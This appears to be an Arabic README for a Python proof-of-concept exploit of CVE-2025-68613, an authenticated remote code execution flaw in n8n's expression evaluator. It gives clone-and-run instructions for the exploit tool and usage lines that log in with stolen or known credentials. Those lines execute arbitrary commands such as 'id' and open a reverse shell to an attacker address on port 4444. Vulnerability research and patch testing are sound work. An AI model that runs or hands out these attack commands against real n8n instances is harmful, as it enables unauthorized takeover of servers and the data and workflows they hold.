
استغلال Python لثغرة CVE-2025-68613.
إثبات المفهوم (PoC) لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد الحرجة في منصة أتمتة سير العمل n8n.
توجد الثغرة في نظام تقييم التعبيرات في n8n. لا يتم عزل التعبيرات التي يقدمها المستخدم بشكل صحيح، مما يسمح للمهاجمين المصادَق عليهم بتنفيذ تعليمات برمجية عشوائية على النظام المضيف.
معرّف CVE: CVE-2025-68613
نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد (RCE)
المكوّن: مُقيّم التعبيرات
git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt
python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]
-t, --target : عنوان الهدف (مثل: http://localhost:5678)-u, --username : البريد الإلكتروني لحساب n8n-p, --password : كلمة مرور حساب n8n-c, --cmd : أمر النظام المطلوب تنفيذه--reverse-shell : تشغيل قشرة عكسية (الصيغة: IP PORT)python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"
python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444